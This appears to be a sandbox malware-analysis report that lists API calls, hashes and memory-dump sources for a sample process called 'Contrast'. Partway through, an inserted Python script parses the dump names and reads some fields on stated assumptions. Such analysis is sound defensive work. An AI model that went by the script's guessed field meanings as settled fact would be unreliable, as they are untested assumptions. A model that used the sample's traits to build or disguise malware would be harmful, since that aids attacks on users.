                                                                                                                                          • Part of subcall function 00532F85: GetLastError.KERNEL32(00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532FAB
                                                                                                                                        • _free.LIBCMT ref: 005792E7
                                                                                                                                        • _free.LIBCMT ref: 005792F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                        • Instruction ID: 0db091ea057497b2aeaeecdd1ca2c36e27144a9ac82ccc0e69064c08a049d953
                                                                                                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                        • Instruction Fuzzy Hash: 45E012B1605A1357CA24B578794AEA37FEC6FC8751F15051DB40DD7543CE24E8819178
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CALL
                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                        • Opcode ID: 8d3cc5e7473c5b849749d37cc38ffe25d0fbef2c7034a6e878b8fd5c48324125
                                                                                                                                        • Instruction ID: 33328404196443abb9e924445624faacbe367da674baa474ae3a40155d5adefe
                                                                                                                                        • Opcode Fuzzy Hash: 8d3cc5e7473c5b849749d37cc38ffe25d0fbef2c7034a6e878b8fd5c48324125
                                                                                                                                        • Instruction Fuzzy Hash: 3F325C74508301DFEB24DF14C499AAABFE1BF85304F15895DE88A9B362D731EC85CB82
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0057614E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                        • Opcode ID: 66e5d42048eda6d0001c91a4d99bcdb97655c0fa1715f4cca900ced0a4914cbf
                                                                                                                                        • Instruction ID: 200b00a9206e45f68f03fa0eb49680612c1dcc4ec08d0cdafd68f4838f9e6c3c
                                                                                                                                        • Opcode Fuzzy Hash: 66e5d42048eda6d0001c91a4d99bcdb97655c0fa1715f4cca900ced0a4914cbf
                                                                                                                                        • Instruction Fuzzy Hash: 3541E9B650060A9FDB11DF64D8859AF7BB8FF94350B14853EE51AD7281EB30DE40DB50
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
• Instruction ID: add964f2b35c1e242eaba898f84bad7f6206ce660fc40033d5d7e1246379b5e9
• Opcode Fuzzy Hash: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
• Instruction Fuzzy Hash: AD41D77250820E9FDB10EFB8B88597EBFACFF4D340F248899E54997281DA719D00EB50
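The dump-source names repeated in every function record of this section follow one naming scheme, and the report gives enough cross-checks to read them: the snapshot file name hcaresult_10_2_510000 confirms PID 10, dump stage 2 and module base 0x510000, and the "Offset: 00510000" line is the base that the "ref:" addresses in the APIs lists are relative to. The following Python is an added example, not Joe Sandbox code, that parses those names into fields, reconstructs the dumped module's region layout and converts the report's "ref:" virtual addresses to RVAs for matching against the on-disk PE. Reading the fifth field as a Windows PAGE_* protection value and the third as a per-dump identifier are assumptions; they are consistent with 0x20 on the code region at 0x511000, 0x02 on the header region at 0x510000 and 0x04 on the data region at 0x5D0000, but the last three fields are deliberately left undecoded.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Windows PAGE_* protection constants from winnt.h.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Joe Sandbox dump names: eight dot-separated hex fields plus ".sdmp".
_HEX = r"([0-9A-Fa-f]+)"
_SDMP_RE = re.compile(r"^" + r"\.".join([_HEX] * 8) + r"\.sdmp$")

# Values copied from the report above; the module base is its "Offset" line.
REPORT_MODULE_BASE = 0x510000
REPORT_SOURCE = "0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp"
REPORT_ASSOCIATED = [
    "0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File",
    "0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File",
    "0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File",
    "0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File",
    "0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File",
]


@dataclass(frozen=True)
class DumpSource:
    pid: int          # field 1: process id; 0x0A == 10 matches hcaresult_10_2_...
    stage: int        # field 2: dump stage; 2 matches hcaresult_10_2_...
    dump_id: str      # field 3: assumed per-dump identifier, kept as text
    base: int         # field 4: start address of the dumped region
    protection: int   # field 5: assumed PAGE_* protection of the region
    tail: Tuple[str, str, str]  # fields 6-8: not decoded here

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:08X}")


def parse_dump_source(name: str) -> DumpSource:
    """Parse one .sdmp name; tolerates the 'Download File' link label that the
    HTML report glues onto the filename when the page is copied as text."""
    name = name.strip()
    if name.endswith("Download File"):
        name = name[: -len("Download File")]
    m = _SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    f = m.groups()
    return DumpSource(int(f[0], 16), int(f[1], 16), f[2], int(f[3], 16),
                      int(f[4], 16), (f[5], f[6], f[7]))


def module_layout(names: Iterable[str], module_base: int) -> Tuple[List[Tuple[int, int, str]], bool]:
    """Sort the dumps of one module by address and return
    ([(va, rva, protection_name), ...], has_wx). has_wx is True when any
    region is both writable and executable, which in a dumped image is the
    first place to look for unpacked or self-modifying code."""
    dumps = sorted((parse_dump_source(n) for n in names), key=lambda d: d.base)
    if len({(d.pid, d.stage) for d in dumps}) != 1:
        raise ValueError("dumps come from more than one process or stage")
    regions = [(d.base, d.base - module_base, d.protection_name) for d in dumps]
    has_wx = any(d.protection in (0x40, 0x80) for d in dumps)
    return regions, has_wx


def va_to_rva(va, module_base: int = REPORT_MODULE_BASE) -> int:
    """Turn a 'ref: 0052527E' address from the report into an RVA, so it can
    be looked up in the on-disk PE whatever image base that file uses."""
    if isinstance(va, str):
        va = int(va, 16)
    if va < module_base:
        raise ValueError("address lies below the module base")
    return va - module_base


if __name__ == "__main__":
    regions, wx = module_layout([REPORT_SOURCE] + REPORT_ASSOCIATED, REPORT_MODULE_BASE)
    for va, rva, prot in regions:
        print(f"{va:08X}  rva={rva:06X}  {prot}")
    print("W+X region present:", wx)
    print("IsDebuggerPresent call site RVA:", hex(va_to_rva("0052527E")))
```

Run as a script it prints the six regions of the module at 0x510000 in address order with their protections, reports that none of them is writable and executable, and gives the RVA 0x1527E for the IsDebuggerPresent call site listed in the next record's APIs.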
APIs
• IsThemeActive.UXTHEME ref: 00525FEF
  • Part of subcall function 0053359C: __lock.LIBCMT ref: 005335A2
  • Part of subcall function 0053359C: DecodePointer.KERNEL32(00000001,?,00526004,00568892), ref: 005335AE
  • Part of subcall function 0053359C: EncodePointer.KERNEL32(?,?,00526004,00568892), ref: 005335B9
  • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00525F18
  • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00525F2D
  • Part of subcall function 00525240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
  • Part of subcall function 00525240: IsDebuggerPresent.KERNEL32 ref: 0052527E
  • Part of subcall function 00525240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
  • Part of subcall function 00525240: SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0052602F
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
• Opcode ID: d0aa45b8df055166f0cb7d4048fd8244d6b043d8ceeb8d08ed77f7b2c12c8bcf
• Instruction ID: 3f98c5bd9bc192005a33aa642f779781eaacdc0752d22a884bcfeb8fbdea0dd9
• Opcode Fuzzy Hash: d0aa45b8df055166f0cb7d4048fd8244d6b043d8ceeb8d08ed77f7b2c12c8bcf
• Instruction Fuzzy Hash: A0118C718093569BCB20DF69ED0995ABFE8FFA9310F00491FF044872A1EB709588DF92
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
• Opcode ID: 8db7e2e741dff91396ee1025893e9ee2946e959ec8686c19acbf2f089a809874
• Instruction ID: 0b3b388e3172dbb2bfc0fa06dd40f7d2120500494427e2003534c11d9732a161
• Opcode Fuzzy Hash: 8db7e2e741dff91396ee1025893e9ee2946e959ec8686c19acbf2f089a809874
• Instruction Fuzzy Hash: 5301217180074AEBCF11AFA68C0999EBF61BFC0360F248515B9245A1A1EB758A15DB91
APIs
  • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
• __lock_file.LIBCMT ref: 0053560B
  • Part of subcall function 00536E3E: __lock.LIBCMT ref: 00536E61
• __fclose_nolock.LIBCMT ref: 00535616
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: f496de62ce70e197dd1ae583c6db90b3b58d4ded47ed4fd06c3b63fd49be4c32
• Instruction ID: abd7ace6be2f62ad62d108b2b828ed22932f43c24a2eed493d0120d7d2e1c5f8
• Opcode Fuzzy Hash: f496de62ce70e197dd1ae583c6db90b3b58d4ded47ed4fd06c3b63fd49be4c32
• Instruction Fuzzy Hash: 54F0B471802B07DAD7156BB5880AB6EBFA17F80330F219609F428AB1C1DF7C59019F91
APIs
• __lock_file.LIBCMT ref: 00535EB4
• __ftell_nolock.LIBCMT ref: 00535EBF
  • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
• Opcode ID: 4d85a873f1c731a386c6446c196f2611ceb9f2f3827b1189c4a73f34b2317a86
• Instruction ID: fce2b42fd168b4c78e524e7ecc30ec33ce6f3006b3de62ddaccf5284dfbe71e8
• Opcode Fuzzy Hash: 4d85a873f1c731a386c6446c196f2611ceb9f2f3827b1189c4a73f34b2317a86
• Instruction Fuzzy Hash: F3F0EC319117179AD700BBB4880B76E7F947F81331F214645F024EB1D1DFB84E01AB51
APIs
• _memset.LIBCMT ref: 00525AEF
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 00525B1F
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
• Opcode ID: 247080d8818060111193823c2dd50f2f1dc5e2400dfa86b4cddef664140217ed
• Instruction ID: 91ba1514e4f01a13869923fb1f38e7d7581bcdbf22de9ed9a71c4471a1020b05
• Opcode Fuzzy Hash: 247080d8818060111193823c2dd50f2f1dc5e2400dfa86b4cddef664140217ed
• Instruction Fuzzy Hash: 57F0A77481935C9FD7A2DB24DC497957BBCA705308F0001EBAA4896292E7750B8CDF51
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID:
• API String ID: 252777609-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 65845b3986b00c25567d1d909e6418e794083a4ac2868621f55ad49217b20fbd
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: B431E470B00209DFC718DF58C4A0969FBAAFF49340F649AA5E409CB291E731EDC1DB80
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: LoadString$__swprintf
• String ID:
• API String ID: 207118244-0
• Opcode ID: 4a22128ca4898d6bfc2535d15d3a522bd595ec1c8a4f422df8ad97f2eaf10b18
• Instruction ID: da7161fa406c141d72ee1e41e2926ae42b50b83be450598d150261478dddde3c
• Opcode Fuzzy Hash: 4a22128ca4898d6bfc2535d15d3a522bd595ec1c8a4f422df8ad97f2eaf10b18
• Instruction Fuzzy Hash: CEB12A34A0010A9FCF14EF98D855DEEBFB5FF99710F10811AF915AB291EB70A946CB60
APIs
Similarity
• API ID: _memmove
APIs
Similarity
• API ID: _free
APIs
Similarity
• API ID: ClearVariant
APIs
  • Part of subcall function 00524B29: FreeLibrary.KERNEL32(00000000,?), ref: 00524B63
  • Part of subcall function 0053547B: __wfsopen.LIBCMT ref: 00535486
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
  • Part of subcall function 00524ADE: FreeLibrary.KERNEL32(00000000), ref: 00524B18
  • Part of subcall function 005248B0: _memmove.LIBCMT ref: 005248FA
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
APIs
Similarity
• API ID: _memmove
APIs
Similarity
• API ID: ClearVariant
APIs
Similarity
• API ID: _memmove
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00584998
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1431749950-0
                                                                                                                                        • Opcode ID: 6cb955a1c8ec1be52c6b1c6b003230dc4b9f556969259ed987ce3751cc59e902
                                                                                                                                        • Instruction ID: 842de74525ba28aabc6afbfdbe72561261a2c52a7aaf6449cb2ca07457c7dbf4
                                                                                                                                        • Opcode Fuzzy Hash: 6cb955a1c8ec1be52c6b1c6b003230dc4b9f556969259ed987ce3751cc59e902
                                                                                                                                        • Instruction Fuzzy Hash: B0F0313560820AAF9B14FB65D84EC9F7FBCFF99320B004455F8099B291DE70AD85DB64
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fseek
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2937370855-0
                                                                                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                        • Instruction ID: bb639be3336c389ecff6c1c3051c76e2bd5ac68ab593f3112eae13ded5bc412a
                                                                                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                        • Instruction Fuzzy Hash: F4F085B6400208BFDF108F94EC04CEBBF7AFF89320F004598F9045B210D232EA219BA0
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,005227AF,?,00000001), ref: 00524A63
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 18e5f7c25118636c4ace384ff4eb8d179664f635c1cc6bfdd3b43720de02a0c7
                                                                                                                                        • Instruction ID: 2623584a07edd4296eec3042cdf47ae241201ba6d97a96c0a156b15ba0f3e62f
                                                                                                                                        • Opcode Fuzzy Hash: 18e5f7c25118636c4ace384ff4eb8d179664f635c1cc6bfdd3b43720de02a0c7
                                                                                                                                        • Instruction Fuzzy Hash: A3F01571145722CFCB349F64E894816BFF2BF16325320992EE1D783650C731A984DF44
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 192ee89963bf4a4a3738cc89b5ba5b79104585825a34d990593119606a8abfad
                                                                                                                                        • Instruction ID: d19631f534cc8849d5c05a1ee5f4833ad93306c161771318e274664ff5658695
                                                                                                                                        • Opcode Fuzzy Hash: 192ee89963bf4a4a3738cc89b5ba5b79104585825a34d990593119606a8abfad
                                                                                                                                        • Instruction Fuzzy Hash: D0E02BB17087469EFB309B78D408762FFE8BB41312F10592BD895822C0E3755CDC97A1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                        • Instruction ID: d52cb906e9fa71906f72d9273efd4c2baf79b69d3993a99160b5ee559c2f11f0
                                                                                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                        • Instruction Fuzzy Hash: 0CF0F87240020DFFDF05CF90C945EAABB79FF15314F208589F9198B252D336DA21AB91
                                                                                                                                        APIs
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005309E4
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongNamePath_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2514874351-0
                                                                                                                                        • Opcode ID: 83e161cf7e377b7dad1660cb207304afb0ac03f9e512c8f1d119c0a2d23be73a
                                                                                                                                        • Instruction ID: c416d2baa376bc39d0551a862360f492c4bebc8ba7d8cc978251f2fada2b4cd3
                                                                                                                                        • Opcode Fuzzy Hash: 83e161cf7e377b7dad1660cb207304afb0ac03f9e512c8f1d119c0a2d23be73a
                                                                                                                                        • Instruction Fuzzy Hash: 68E0863290012957C72196989C09FEA77DDEFC9790F0401B6FC08D7244D9609C818695
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                                                                                                                                        • Instruction ID: 6a0ec1af87f7116d7fdcd2dceb7415abfc50cf42cf9fe18b0e907f997e0683aa
                                                                                                                                        • Opcode Fuzzy Hash: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                                                                                                                                        • Instruction Fuzzy Hash: 9BB092B4010680569F281E3C29480993B01A8533A97D86B82E47C856E19339884BF920
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
